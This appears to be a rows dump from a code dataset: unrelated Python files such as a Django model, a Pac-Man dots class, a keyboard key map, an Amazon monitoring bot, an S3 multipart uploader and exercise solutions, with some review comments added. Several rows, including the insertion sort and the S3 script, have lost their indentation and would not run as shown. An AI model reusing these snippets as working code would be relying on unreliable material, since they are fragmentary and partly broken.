    # NOTE(review): Django appends "_id" to FK columns, so this field is
    # `user_id` in Python but `user_id_id` in the database; `user` would be
    # the conventional name, but renaming would break existing queries
    # and migrations.
    user_id = models.ForeignKey(UserAccount, on_delete=models.CASCADE, related_name='tweets')
    # Tweet body text.
    content = models.CharField(max_length=5000)
    # Optional image reference stored as a plain string (empty by default).
    image = models.CharField(max_length=1000, default='', blank=True)
    # Set once when the row is first created.
    created_at = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return self.content

    class Meta:
        # Newest tweets first.
        ordering = ['-created_at']
from dot import Dot
class Dots:
    """The four rows/columns of dots lining the edges of the maze."""

    def __init__(self, WIDTH, HEIGHT,
                 LEFT_VERT, RIGHT_VERT,
                 TOP_HORIZ, BOTTOM_HORIZ):
        self.WIDTH = WIDTH
        self.HEIGHT = HEIGHT
        self.TH = TOP_HORIZ
        self.BH = BOTTOM_HORIZ
        self.LV = LEFT_VERT
        self.RV = RIGHT_VERT
        self.SPACING = 75
        self.EAT_DIST = 57  # changed for pacman to eat dots on the verges
        # Initialize four rows of dots, based on spacing and maze size.
        self.top_row = [Dot(self.SPACING * i, self.TH)
                        for i in range(self.WIDTH // self.SPACING + 1)]
        self.bottom_row = [Dot(self.SPACING * i, self.BH)
                           for i in range(self.WIDTH // self.SPACING + 1)]
        self.left_col = [Dot(self.LV, self.SPACING * i)
                         for i in range(self.HEIGHT // self.SPACING + 1)]
        self.right_col = [Dot(self.RV, self.SPACING * i)
                          for i in range(self.HEIGHT // self.SPACING + 1)]

    def _groups(self):
        """Return the four dot lists in display/eat order."""
        return (self.top_row, self.bottom_row, self.left_col, self.right_col)

    def display(self):
        """Call each dot's display method."""
        for group in self._groups():
            for dot in group:
                dot.display()

    def _in_reach(self, dot, pac_x, pac_y):
        """Return True when `dot` is within eating distance of pacman."""
        return (abs(dot.x - pac_x) < self.EAT_DIST and
                abs(dot.y - pac_y) < self.EAT_DIST)

    def eat(self, pac_x, pac_y):
        """Remove every dot that pacman at (pac_x, pac_y) can reach.

        The original repeated a collect-then-delete loop four times;
        rebuilding each list in place (slice assignment keeps the list
        object's identity) is equivalent and avoids mutating a list
        while iterating over it.
        """
        for group in self._groups():
            group[:] = [dot for dot in group
                        if not self._in_reach(dot, pac_x, pac_y)]

    def dots_left(self):
        """Return the number of remaining dots in the collection."""
        return sum(len(group) for group in self._groups())
|
## Mail Server details
# Gmail SMTP over implicit SSL (port 465), hence TLS off / SSL on.
MAIL_SERVER='smtp.gmail.com'
MAIL_PORT = 465
# NOTE(review): placeholder credentials -- real values should come from
# environment variables or a secrets store, never be committed to source.
MAIL_USERNAME = 'account_id@gmail.com'
MAIL_PASSWORD = 'password'
MAIL_USE_TLS = False
MAIL_USE_SSL = True
MAIL_SENDER_EMAIL = ''
MAIL_RECEIVER_EMAIL = ''

# Etherscan / Ethereum settings.
ETHERSCAN_API_KEY = ''
ETH_WALLET_ADDRESS = ''
# 10**18 wei per ether.
WEI_DIVIDER = 1000000000000000000
from keyboardlayout.key import Key

# Maps numeric key codes to Key enum members. Covers a US qwerty layout
# plus some azerty extras; presumably the codes are the GUI backend's
# keysym/keycode values -- confirm against the caller.
# Bug fix: the azerty section restated 45 (MINUS) and 61 (EQUALS) with the
# same values already mapped above; the duplicate dict keys were removed
# (in a dict literal the later entry silently wins, so behavior is
# unchanged).
KEY_MAP = {
    96: Key.BACKQUOTE,
    126: Key.ASCII_TILDE,
    49: Key.DIGIT_1,
    33: Key.EXCLAMATION,
    50: Key.DIGIT_2,
    64: Key.AT,
    51: Key.DIGIT_3,
    35: Key.NUMBER,
    52: Key.DIGIT_4,
    36: Key.DOLLAR,
    53: Key.DIGIT_5,
    37: Key.PERCENT,
    54: Key.DIGIT_6,
    94: Key.CIRCUMFLEX,
    55: Key.DIGIT_7,
    38: Key.AMPERSAND,
    56: Key.DIGIT_8,
    42: Key.ASTERISK,
    57: Key.DIGIT_9,
    40: Key.LEFTPAREN,
    48: Key.DIGIT_0,
    41: Key.RIGHTPAREN,
    45: Key.MINUS,
    43: Key.PLUS,
    61: Key.EQUALS,
    65288: Key.BACKSPACE,
    65289: Key.TAB,
    113: Key.Q,
    81: Key.Q_UPPER,
    119: Key.W,
    87: Key.W_UPPER,
    101: Key.E,
    69: Key.E_UPPER,
    114: Key.R,
    82: Key.R_UPPER,
    116: Key.T,
    84: Key.T_UPPER,
    121: Key.Y,
    89: Key.Y_UPPER,
    117: Key.U,
    85: Key.U_UPPER,
    105: Key.I,
    73: Key.I_UPPER,
    111: Key.O,
    79: Key.O_UPPER,
    112: Key.P,
    80: Key.P_UPPER,
    91: Key.LEFTBRACKET,
    123: Key.BRACELEFT,
    93: Key.RIGHTBRACKET,
    125: Key.BRACERIGHT,
    92: Key.BACKSLASH,
    124: Key.PIPE,
    65509: Key.CAPSLOCK,
    65792: Key.CAPSLOCK,  # MACOS
    97: Key.A,
    65: Key.A_UPPER,
    115: Key.S,
    83: Key.S_UPPER,
    100: Key.D,
    68: Key.D_UPPER,
    102: Key.F,
    70: Key.F_UPPER,
    103: Key.G,
    71: Key.G_UPPER,
    104: Key.H,
    72: Key.H_UPPER,
    106: Key.J,
    74: Key.J_UPPER,
    107: Key.K,
    75: Key.K_UPPER,
    108: Key.L,
    76: Key.L_UPPER,
    59: Key.SEMICOLON,
    58: Key.COLON,
    39: Key.SINGLEQUOTE,
    34: Key.DOUBLEQUOTE,
    65293: Key.RETURN,
    131074: Key.LEFT_SHIFT,  # macOs
    131330: Key.LEFT_SHIFT,  # macOs
    65505: Key.LEFT_SHIFT,
    122: Key.Z,
    90: Key.Z_UPPER,
    120: Key.X,
    88: Key.X_UPPER,
    99: Key.C,
    67: Key.C_UPPER,
    118: Key.V,
    86: Key.V_UPPER,
    98: Key.B,
    66: Key.B_UPPER,
    110: Key.N,
    78: Key.N_UPPER,
    109: Key.M,
    77: Key.M_UPPER,
    44: Key.COMMA,
    60: Key.LESSTHAN,
    46: Key.PERIOD,
    62: Key.GREATERTHAN,
    47: Key.FORWARDSLASH,
    63: Key.QUESTION,
    131076: Key.RIGHT_SHIFT,  # macOs
    65506: Key.RIGHT_SHIFT,
    262145: Key.LEFT_CONTROL,  # macOs
    65507: Key.LEFT_CONTROL,
    1048584: Key.LEFT_META,  # macOs
    65511: Key.LEFT_META,
    524320: Key.LEFT_ALT,  # macOs
    65513: Key.LEFT_ALT,
    32: Key.SPACE,
    524352: Key.RIGHT_ALT,  # macOs
    65514: Key.RIGHT_ALT,
    1048592: Key.RIGHT_META,  # macOs
    65512: Key.RIGHT_META,
    7208976: Key.CONTEXT_MENU,  # macOs
    1073741925: Key.CONTEXT_MENU,
    270336: Key.RIGHT_CONTROL,
    65508: Key.RIGHT_CONTROL,  # macOs
    65362: Key.UP_ARROW,
    65364: Key.DOWN_ARROW,
    65361: Key.LEFT_ARROW,
    65363: Key.RIGHT_ARROW,
    # azerty
    249: Key.U_GRAVE,
    2812: Key.CARET,  # NOTE(review): unusual code -- confirm against the backend
    233: Key.E_ACUTE,
    232: Key.E_GRAVE,
    95: Key.UNDERSCORE,
    231: Key.C_CEDILLE,
    224: Key.A_GRAVE,
    176: Key.DEGREE,
    168: Key.DIACRATICAL,
    163: Key.POUND,
    226: Key.A,  # A_CIRCUMFLEX
    234: Key.E,  # E_CIRCUMFLEX
    238: Key.I,  # I_CIRCUMFLEX
    244: Key.O,  # O_CIRCUMFLEX
    251: Key.U,  # U_CIRCUMFLEX
    167: Key.SECTION,
}
|
arr = list(map(int, input().split(' ')))
for idx, _ in enumerate(arr):
midx = idx
while midx > 0 and arr[midx] < arr[midx - 1]:
arr[midx], arr[midx - 1] = arr[midx - 1], arr[midx]
midx -= 1
for i in arr:
print(i, end=' ') |
# 700 yen base price plus 100 per non-'x' character in the input
# (presumably each 'o' marks a chosen topping).
S = input().replace('x', '')
print(700 + 100 * len(S))
|
from bot import Bot

email = ''
password = ''

# Amazon ASIN codes of the products to monitor.
# Bug fix: 'B07VYRQZ69' appeared twice in the original list, which started
# the bot twice for the same product; the duplicate was removed
# (order preserved).
product_codes = ['B01545GQ9O', 'B016DCAOZY', 'B07MJKHYDC', 'B016DCAOOA',
                 'B07571223K', 'B077ZC9D8R', 'B00EP56O0G', 'B07VBM91JB',
                 'B07YY9ZD7M', 'B07T3MNKKW', 'B008WX2OY2', 'B07T5V4TCV',
                 'B01613I79K', 'B07VYRQZ69', 'B0015R1BL4', 'B074V8TCMY',
                 'B00FX4EBS0', 'B07YY9T1FQ']

if __name__ == '__main__':
    for product_code in product_codes:
        Bot(product_code, email, password).start()
|
#! /usr/bin/env python
"""
multipart-upload.
Upload large files (2+ GB) in multiple parts.
"""
if __name__ == '__main__':
import argparse as ap
import boto
import math
import os
import sys
from filechunkio import FileChunkIO
from aws_keys import AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY
parser = ap.ArgumentParser(
prog='multipart-upload',
conflict_handler='resolve',
description='Upload large files (2+ GB) in multiple parts.')
group1 = parser.add_argument_group('Options', '')
group1.add_argument('--file', metavar="STR", type=str, required=True,
help='File to upload.')
group1.add_argument('--bucket', metavar="STR", type=str, required=True,
help='Bucket to upload file to.')
group1.add_argument('--bucket_path', metavar="STR", type=str,
help='Specific path in bucket. (Default: /)',
default="")
group1.add_argument('--chunk_size', metavar="INT", type=int,
help='Size of chunks (in MB) to upload. (Default: 50)',
default=50)
group1.add_argument('-h', '--help', action='help',
help='Show this help message and exit')
if len(sys.argv) == 1:
parser.print_usage()
sys.exit(1)
args = parser.parse_args()
conn = boto.connect_s3(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
bucket = conn.get_bucket(args.bucket)
# File info
file = args.file
file_size = os.stat(file).st_size
# Create a multipart upload request
mp = bucket.initiate_multipart_upload("{0}/{1}".format(
args.bucket_path,
os.path.basename(file)
))
chunk_size = args.chunk_size * 1048576
chunk_count = int(math.ceil(file_size / chunk_size))
# Upload file
print "Uploading {0} to '{1}/{2}'".format(
file,
args.bucket,
args.bucket_path
)
for i in range(chunk_count + 1):
print "Uploading chunk {0} of {1}...".format(i + 1, chunk_count + 1)
offset = chunk_size * i
bytes = min(chunk_size, file_size - offset)
with FileChunkIO(file, 'r', offset=offset, bytes=bytes) as fp:
mp.upload_part_from_file(fp, part_num=i + 1)
# Finish the upload
print "Upload completed."
mp.complete_upload()
|
# % binds tighter than +, so the original parentheses were redundant;
# evaluates to (51 mod 24) + 2 == 5.
toque = 51 % 24 + 2
print(toque)
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
def count_first_sundays(start_year=1901, end_year=2000):
    """Count the months whose first day falls on a Sunday.

    Covers January of `start_year` through December of `end_year`
    inclusive (Project Euler problem 19 with the defaults).
    """
    # Bug fix: the original while-loop advanced the date *before* testing
    # it, so it never tested 1901-01-01 and did test 2001-01-01 (one month
    # past the range); the result was correct only because 2001-01-01
    # happened to be a Monday.
    count = 0
    for year in range(start_year, end_year + 1):
        for month in range(1, 13):
            if datetime(year, month, 1).weekday() == 6:  # 6 == Sunday
                count += 1
    return count


if __name__ == "__main__":
    print(count_first_sundays())
|
from django.urls import include, path

from . import views

# URL routes for this app.
urlpatterns = [
    # List all passwords.
    path('', views.ListPassword.as_view()),
    # Retrieve a single password by its integer id.
    path('<int:id>/', views.DetailPassword.as_view()),
    # django-rest-auth endpoints (login/logout/etc.).
    path('rest-auth/', include('rest_auth.urls')),
]
#!/usr/bin/env python
"""Remove miscellaneous expired things (Credentials, CachedFeeds, Loans, etc.)
from the database.
"""
import os
import sys

# Make the package root (one level above this script's directory)
# importable before pulling in core.scripts.
bin_dir = os.path.dirname(__file__)
package_dir = os.path.join(bin_dir, "..")
sys.path.append(os.path.abspath(package_dir))

from core.scripts import RunReaperMonitorsScript

RunReaperMonitorsScript().run()
|
from Pages.ContentPages.BasePage import Page
from selenium.webdriver.common.by import By
from magic_box.find_elements import find_element
class AddContentPage(Page):
    """Page object for the "add content" page: exposes the add buttons
    for each content type via XPath locators.
    """

    def __init__(self, driver):
        self.driver = driver
        self.locators = {
            'landing_add_button': {'by': By.XPATH, 'value': 'id("block-mainpagecontent")/ul[1]/li[1]/a[1]'},
            'page_add_button': {'by': By.XPATH, 'value': '//a[@href="/node/add/page"]'},
            'press_release_add_button': {'by': By.XPATH, 'value': 'id("block-mainpagecontent")/ul[1]/li[1]/a[3]'},
            'webform_add_button': {'by': By.XPATH, 'value': 'id("block-mainpagecontent")/ul[1]/li[1]/a[4]'},
            'solution_add_button': {'by': By.XPATH, 'value': '//a[@href="/node/add/solution"]'},
        }

    def get_landing_add_button(self):
        return self.driver.find_element(**self.locators['landing_add_button'])

    def get_page_add_button(self):
        return self.driver.find_element(**self.locators['page_add_button'])

    def get_press_release_add_button(self):
        return self.driver.find_element(**self.locators['press_release_add_button'])

    def get_webform_add_button(self):
        return self.driver.find_element(**self.locators['webform_add_button'])

    def get_solution_add_button(self):
        # NOTE(review): uses the magic_box find_element helper rather than
        # driver.find_element like the getters above -- confirm whether the
        # difference is intentional.
        return find_element(self.driver, **self.locators['solution_add_button'])
|
from twisted.trial.unittest import TestCase
from twisted.test import proto_helpers
from twisted.internet.protocol import ClientFactory
from .. import spdy_headers, c_zlib
example_headers = "8\xea\xdf\xa2Q\xb2b\xe0f`\x83\xa4\x17\x06{\xb8\x0bu0,\xd6\xae@\x17\xcd\xcd\xb1.\xb45\xd0\xb3\xd4\xd1\xd2\xd7\x02\xb3,\x18\xf8Ps,\x83\x9cg\xb0?\xd4=:`\x07\x81\xd5\x99\xeb@\xd4\x1b3\xf0\xa3\xe5i\x06A\x90\x8bu\xa0N\xd6)NI\xce\x80\xab\x81%\x03\x06\xbe\xd4<\xdd\xd0`\x9d\xd4<\xa8\xa5\xbc(\x89\x8d\x81\x13\x1a$\xb6\x06\x0c,\xa0\xdc\xcf \x95\x9b\x9a\x92\x99\x98\x04LvyUz\xb9\x89\xc5\xd9\x99z\xf9E\xe9V\x96\x06\x06\x06\x0cl\xb9\xc0\x12(?\x85\x81\xd9\xdd5\x84\x81\xad\x18hNn*\x03kFI\t@\x05\xc5\x0c\xcc\xa0\xd0a\xd4g\xe0Bdi\x862\xdf\xfc\xaa\xcc\x9c\x9cD}S=\x03\x05\r\xdf\xc4\xe4\xcc\xbc\x92\xfc\xe2\x0ck\x05O`*\xcbQ\x00\n(\xf8\x07+D(\x18\x1a\xc4\x9b\xc5[h*8\x02\x03,5<5\xc9;\xb3D\xdf\xd4\xd8T\xcf\xd0PA\xc3\xdb#\xc4\xd7GG!'3;U\xc1=59;_S\xc19\x03XT\xa5\xea\x1b\x9a\xeb\x01\xc3\xd3\xccX\xcf\xc4L!81-\xb1(\x13\xaa\x89\x81\x1d\x1aa\x0c\x1c\xb0x\x04\x00\x00\x00\xff\xff"
class SpdyHeaderTest(TestCase):
    """Tests for spdy_headers, driven by the captured compressed header
    block in `example_headers`."""

    def testSampleHeaders(self):
        # Parsing the sample block should yield a known header value.
        headers = spdy_headers.SpdyHeaders(example_headers)
        self.assertEqual(['en-US,en;q=0.8'], headers.getRawHeaders('accept-language'))

    def testRoundTrip(self):
        # Decompressing the raw block with the SPDY dictionary should match
        # the parser's own uncompressed serialization of the same headers.
        headers = spdy_headers.SpdyHeaders(example_headers)
        decompressedHeaders = c_zlib.decompress(example_headers, dictionary=spdy_headers.dictionary)
        self.assertEqual(decompressedHeaders, headers.asBinary(compressed=False))
|
a, b = input().split(' ')
a = int(a)
b = int(b)
if a >= 0:
if b > 0:
print(a // b)
print(a % b)
else:
b = -b
print( -(a // b))
print(a % b)
else:
if b > 0:
print(a // b)
a -= b
print(a % b)
else:
a += b
print(a // b)
print((a- b) - (a//b) * b)
|
from gym_do_not_repeat_yourself.envs.do_not_repeat_yourself_env import DoNotRepeatYourselfEnv
|
__author__ = 'Julia'
import sys

# Flag set to 1 by merge() when two elements differ by less than the
# threshold.
b = 0
# All numbers read from stdin.
A = []
# Apparently intended to hold the threshold -- see NOTE below.
k = 0
for line in sys.stdin:
    # NOTE(review): `line` is a string, so `line == 0` is never true and the
    # branch below is dead code; it would also crash if reached, since `k`
    # is an int and has no .append. Presumably one input line was meant to
    # be parsed into `k` -- confirm against the expected input format.
    if line == 0:
        for word in line.strip().split():
            k.append(int(word))
    for word in line.strip().split():
        A.append(int(word))
def merge(a, c):
    """Merge-sort `a` ascending; set the module-level flag `b` to 1 if two
    elements compared during merging differ by less than `c`.

    Returns the sorted list; `a` itself is not modified.
    """
    global b
    l = len(a)
    # Bug fix: the original base case was `l == 1`, so an empty input list
    # split into two empty halves and recursed forever.
    if l <= 1:
        return a
    a1 = merge(a[:l // 2], c)
    a2 = merge(a[l // 2:], c)
    a_sort = []
    index1, index2 = 0, 0
    while index1 < len(a1) and index2 < len(a2):
        if a1[index1] >= a2[index2]:
            if (a1[index1] - a2[index2]) < c:
                b = 1
            a_sort.append(a2[index2])
            index2 += 1
        else:
            if (a2[index2] - a1[index1]) < c:
                b = 1
            a_sort.append(a1[index1])
            index1 += 1
    # Append whichever half still has elements left.
    if index1 < len(a1):
        a_sort.extend(a1[index1:])
    else:
        a_sort.extend(a2[index2:])
    return a_sort
def check_duplicate(a, c):
    """Return True when no two elements of `a` differ by less than `c`.

    merge() reports a close pair by setting the module-level flag `b`.
    Bug fix: reset the flag before sorting, so repeated calls do not
    return stale results from a previous invocation.
    """
    global b
    b = 0
    merge(a, c)
    return b == 0
check_duplicate(A, k) |
from intent_handling.intents.PrereqsForClassIntent import PrereqsForClassIntent
class ClassRequiresStandingIntent:
    """Handler for the CLASS_REQ_STANDING intent; resolved by delegating
    to PrereqsForClassIntent with the same parameters.
    """

    NAME = 'CLASS_REQ_STANDING'

    def __init__(self, parameters):
        self.parameters = parameters

    def execute(self, db):
        delegate = PrereqsForClassIntent(self.parameters)
        return delegate.execute(db)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.